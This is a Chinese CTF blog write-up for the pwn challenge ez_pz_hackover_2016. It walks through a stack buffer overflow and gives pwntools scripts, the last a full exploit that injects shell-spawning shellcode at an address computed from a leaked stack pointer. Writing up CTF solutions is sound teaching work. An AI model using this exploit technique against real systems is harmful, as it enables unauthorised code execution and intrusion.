ez_pz_hackover_2016

最新推荐文章于 2024-07-04 11:21:01 发布
最新推荐文章于 2024-07-04 11:21:01 发布
阅读量1.3k 收藏 4
点赞数 4
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/112114073
版权

首先查看一下题目的保护,发现保护基本没开,可以栈执行和栈溢出
在这里插入图片描述
用IDA打开程序,关键点在chall函数,首先会打印出s缓冲区的地址,然后接收一个大小不超过1023字节的输入到s缓冲区,然后将缓冲区里换行符后面的内容全部置为0,最后将缓冲区内容与"crashme"这个字符串作比较,如果相同就会进入到vuln函数
在这里插入图片描述
于是,我们进入到vuln函数分析一下,就是将第一个参数长度n的内容复制到dest缓冲区
在这里插入图片描述
那利用方式就呼之欲出了,由于输入到s缓冲区的内容长度不够,无法实现溢出,但是只要进入到vuln函数就可以把构造好的shellcode放入到栈中进行执行
不过首先我们必须要进行绕过,方式就是输入的前面的内容为"crashme\x00",strlen和strcmp都会遇到00字节会截断,然后就会成功的进入到vuln函数将完整的构造好的payload复制到dest缓冲区实现溢出并控制的目的
但是,要成功执行我们的shellcode必须要知道shellcode的位置,而chall函数在执行时就把s缓冲区的地址告诉了我们,因此,只要知道了s缓冲区和shellcode地址的相对偏移量,那么我们每次都可以得到shellcode的地址
那通过脚本调试先确定好执行到覆盖栈的偏移量

from pwn import *
context(log_level = 'debug',os='linux',arch='i386')
p = process('./ez_pz_hackover_2016')
gdb.attach(p)#先要在sendline之前打开gdb调试,若是在sendline之后无法调试
p.recvuntil('> ')
payload = 'crashme\x00' #为了过memcpy,过了memcpy才有机会执行vuln函数
payload += 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'#使用pattern生成
pause()#把程序暂停在这里,可以理解为下断点
p.sendline(payload)

在这里插入图片描述在这里插入图片描述
从输入缓冲区到刚好覆盖掉ebp的偏移为14个字节加上前缀的’crashme\x00’8个字节共22个字节,可以发现memcpy(&dest, &src, n)之后传入到dest的数据到ebp的距离是8+14这里的8是最开始传入的crashme\x00这个8个字节,然后因为retn之前有leave指令,所以实际覆盖到ret还需要+4(32位程序),所以要memcpy到dest的数据要8+14+4=26个字节才能覆盖到retn
注:leave指令相当于mov esp,ebp;pop ebp;导致ebp空间要往高地址增加四个字节(32位)
在这里插入图片描述
所以payload = 'crashme\x00' + 'a'*14 + 'a'*4 + shellcode_addr + shellcode
因为我们传入的shellcode的传到s栈上的,程序开始又给了我们s栈的地址了,所以我们可以利用给出的栈地址做基地址来计算到shellcode的偏移来得出shellcode的地址,虽然地址会随机化但是偏移量不会变

from pwn import *
context(log_level = 'debug',os='linux',arch='i386')
p = process('./ez_pz_hackover_2016')
#p = remote('node3.buuoj.cn', 29530)

gdb.attach(p)
p.recvuntil('crash: ')
stack_addr = int(p.recv(10), 16)#获取题目给我们的s栈开始地址
payload = 'crashme\x00' + 'a'*18 #8+18=26
payload += p32(0) + asm(shellcraft.sh())
#p32(0)是ret的地址,但是我们还不知道具体的地址所以这里用00 00 00 00来模拟调试
p.recvuntil('> ')
p.sendline(payload)
pause()
p.interactive()

在这里插入图片描述
可以看到shellcode是jhh字符开头的
然后查看一下内存情况
在这里插入图片描述
esp和ebp可以确定一个栈空间,所以x/40s $esp就是查看从esp栈顶开始往后的40个地址的数据
在这里插入图片描述
也可以直接用search或者find命令寻找shellcode的地址
在这里插入图片描述
然后,在执行时我们又得到了s栈的地址:0xff917e0c,所以计算偏移为0xff917e0c-0xff917df0=28
在这里插入图片描述
在这里插入图片描述
最终可以构造出我们的exp

#coding=utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

p=process('./ez_pz_hackover_2016')

shellcode = asm(shellcraft.sh())

p.recvuntil('lets crash: ')
stack_addr = int(p.recv(10),16)#接收s栈地址
shellcode_addr = stack_addr-28

payload = 'crashme\x00'.ljust(26,"\x00") #加crashme\x00共26个字节,其余用\x00补
payload += p32(shellcode_addr)+shellcode
p.recvuntil('>')
p.sendline(payload)
#pause()
p.interactive()
沫忆末忆
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2355
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
3S软件
Zzzpiu的博客
12-29 444
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
buu之ez_pz_hackover_2016动态调试
最新发布
hanabi_sh
07-04 254
我好菜
BUUCTF【ez_pz_hackover_2016
weixin_51055545的博客
02-14 1268
BUUCTF【ez_pz_hackover_2016】 例行检查 开了relro,其他保护机制都没开,扔到IDA中分析 漏洞分析 chall()函数中,有fgets(),但长度不够覆盖到返回地址,没法溢出,接着会获取s的长度,然后字符串检索,在这里我给出memchr()的定义:*C 库函数 void *memchr(const void str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。 然后程序会有一个if检查,
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 521
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode的偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
ez_setup.py下载
05-16
ez_setup.py下载
memcpy
weixin_45959515的博客
08-26 155
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
3s话务管理软件
04-20
国威w8249a电话程控软件 3s话务管理软件 软件设置 控制 收费调试 短号设置
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 418
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
[BUUCTF-pwn]——ez_pz_hackover_2016
Y_peak的博客
02-15 312
[BUUCTF-pwn]——ez_pz_hackover_2016 题目地址:https://buuoj.cn/challenges#ez_pz_hackover_2016 checksec一下,NX都没开,十有八九是让自己写shellcode了 在IDA中,main里面没什么可以看的. 在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。 发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln
ctf【ez_pz_hackover_2016
HUANGliang_的博客
10-29 183
ez_pz_hackover_2016
ez_udp_connect
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 TCP 更高。 这个函数通常会传入目标 IP 地址和端口号,然后返回一个文件描述符或套接字,用于后续的数据传输。在使用 `ez_udp_connect` 前,需要先创建一个 UDP 套接字,使用 `socket` 函数即可。函数声明如下: ```c int ez_udp_connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); ``` 其中,`sockfd` 表示创建好的 UDP 套接字的文件描述符或套接字,`addr` 和 `addrlen` 表示要连接的目标地址和端口号。函数返回值为 0 表示成功,否则表示失败。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值